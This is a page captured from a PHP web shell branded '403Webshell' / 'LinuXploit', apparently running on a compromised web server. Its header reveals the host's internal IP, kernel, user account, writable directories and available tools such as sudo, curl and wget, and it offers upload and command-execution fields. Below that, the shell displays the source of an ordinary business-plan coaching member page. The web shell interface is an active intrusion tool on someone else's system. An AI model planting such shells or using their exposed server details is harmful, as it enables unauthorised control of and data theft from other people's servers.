403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/coaching_sites/usbusinessfundingsolutions.com/member/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/coaching_sites/usbusinessfundingsolutions.com/member/business-plan-coach.php
<?php
require_once($_SERVER['DOCUMENT_ROOT'].'/inc/php_header.php');
$title = 'Business Plan Coach'; 
$body_id = 'busp';
if($_SESSION['Client']['businessplan']) {
	$businessplan = get_businessplan($db, $_SESSION['Client']['id']); 
	if(!session_set_businessplan($businessplan)) {
		header('Location: /member/index.php'); 
		die(); 
	} 
} elseif($_SESSION['Client']['businessplan_review']) {
	$_SESSION['BusinessPlan']['Coach'] = get_bp_coach($db,$_SESSION['Client']['businessplan_review_coach']);
	$_SESSION['BusinessPlan']['Coach']['phone'] = '(888) 260-4222 ext '.$_SESSION['BusinessPlan']['Coach']['ext'];
}
if($_SESSION['BusinessPlan']['Coach']['first']=='Jeremy') {
	$_SESSION['BusinessPlan']['Coach']['first'] = 'Janele';
	$_SESSION['BusinessPlan']['Coach']['phone'] = '(555) 555-5555 ext 5';
	$_SESSION['BusinessPlan']['Coach']['email'] = 'example_coach_email@example.com';
}
require_once('header.php');
?>
<?php /*
<script type="text/javascript">
	$("document").ready(function() {	
		$('#btn_ask').click(function() {
			create_modal('<h2 style="margin:0px;">Ask Your Coach A Question</h2>','<div style="border-top:1px dotted #325065;margin-top:10px;padding-top:10px"><form id="ask_question_form"><div class="modal_body"><textarea id="ask_question" name="question" style="width: 500px; height: 350px"></textarea></div><input type="hidden" id="bp_coach_email" name="coach_email" value="<?= strtolower($_SESSION['BusinessPlan']['Coach']['email']);?>" /><center><input id="ask_question_submit" type="submit" value="" /></center></form></div>');
			$('#ask_question_form').submit(function() {
				$('#ask_question_submit').attr('disabled','disabled');
				var data = {};
				data['client_type'] = 'Businessplan';
				data['question'] = escape($('#ask_question').val());
				data['research_coach'] = escape($('#bp_coach_email').val());
				$.ajax({  
			        url: "ajax/send_research_question.php",
					type: "POST",
			        data: data,
			        cache: false,  
			        success: function(html){
				        if(html=='success') {
					        $('#ask_question_form').html("<p style='width:500px;'>Your question has been submitted. Please allow 24-48 hours for a response.</p>");
				        } else {
					       $('#ask_question_form').html("<p style='width:500px;'>There was a problem sending your question. Please try again later.</p>");
				        }
			        },
			        error: function(e) {
				        $('#ask_question_form').html("<p style='width:500px;'>There was a problem sending your question. Please try again later.</p>");
			        }
			    });
			    return false;
			});
		});
	});
	function close_modal() {
		$('.overlay,.modal').remove();
	}
	function create_modal(modal_title,modal_body) {
		var modal = document.createElement('div');
		var overlay = document.createElement('div');
		overlay.className = 'overlay';
		modal.className = 'modal';
		$(modal).html('<div class="modal_frame"><div class="modal_close" title="Close"></div>'+modal_title+''+modal_body+'</div>');
		$(overlay).click(function() {
			$(modal).remove();
			$(overlay).remove();
		});
		$('body').append(overlay);
		$('body').append(modal);
		$(modal).css('display','inline-block');
		var height = $(window).height();
		var width = $(window).width();
		$(overlay).css({'position': 'fixed', 'top': '0px', 'left': '0px', 'width': width, 'height': height, 'background': 'black', 'z-index': '1000', 'opacity': '.75'});
		var left = ($(window).width() - $(modal).width())/2;
		var top = ($(window).height() - $(modal).height())/2;
		$(modal).css({'position': 'fixed', 'left': left, 'top': top, 'z-index': '1001'});
		$('.modal_close').click(function() {
			$(modal).remove();
			$(overlay).remove();
		});
	}
</script>*/?>
            <div id="content" class="size">
            	<table cellspacing="0" cellpadding="0" border="0">
                	<tr>
                    	<td width="680" colspan="3" class="borderBot">
                        	<img src="images/img_coaches.jpg" style="margin:20px -20px 0 -25px" />
                            <h1>Business Plan Coaching</h1>
                            <div id="coachName">
                            	<div>
									<?php /*
                                    <img src="images/img_<?=strtolower($_SESSION['BusinessPlan']['Coach']['first']);?>.png" />
									*/ ?>
                                    <p align="center">Your Business Plan Coach is:</p>
                                    <h1 align="center"><?= ucwords(strtolower($_SESSION['BusinessPlan']['Coach']['first']));?></h1>
                                    <p align="center">Any questions, please email:</p>
                                    <?php /*<p align="center"><a id="btn_ask" href="#"><?=strtolower($_SESSION['BusinessPlan']['Coach']['email']);?></a></p>*/?>
									<p align="center"><?=strtolower($_SESSION['BusinessPlan']['Coach']['email']);?></p>
									<p align="center"><?=strtolower($_SESSION['BusinessPlan']['Coach']['phone']);?></p>
                                </div>
                            </div>
                            <br clear="all" />
							<?php if($_SESSION['Client']['businessplan']) { ?>
                            <p>In order to properly write your business plan we need to know as much information about your business as possible.</p> 

                            <p>To start, please click on the "Business Plan Template" Button below.  Once you click on the button, a new browser window will open up. There are 12 steps to complete the template. After you are finished with each step, click on the "Save" button at the bottom of each screen and your information will be saved.  You can come back to each section at any time to edit or change the information.</p> 

                            <p>The expected time for your business plan to be completed is anywhere from 2-3 weeks from the time you finish the business plan template depending how complete and thorough your answers are to the questions provided.</p>

                            <p>If you have any questions, please direct them to your business plan coach first. For all other questions, please contact us through our support page.</p>
                            <a href="/member/business-plan-template.php" target="_blank" class="btnMore btnBlue" style="margin:40px auto; width:400px">start your business plan template</a>
							<?php } else { ?>
							<p>In order for me to complete your business plan review, I need to get a copy of your current business plan in Microsoft Word Format. Please email me a digital copy of your business plan to <a href="mailto:<?=strtolower($_SESSION['BusinessPlan']['Coach']['email']);?>?Subject=Business%20Plan"><?=strtolower($_SESSION['BusinessPlan']['Coach']['email']);?></a> to get started.</p>
							<?php } ?>
                        </td>
                        <td width="275" rowspan="3" class="columnData">
                        	<? include($_SERVER['DOCUMENT_ROOT'].'/sidebar_news.php'); ?>
                        	<? include($_SERVER['DOCUMENT_ROOT'].'/sidebar_quotes.php'); ?>
                        </td>
                    </tr>
                </table>
            </div>
            
<?php
require_once('footer.php');
?>

Youez - 2016 - github.com/yon3zu
LinuXploit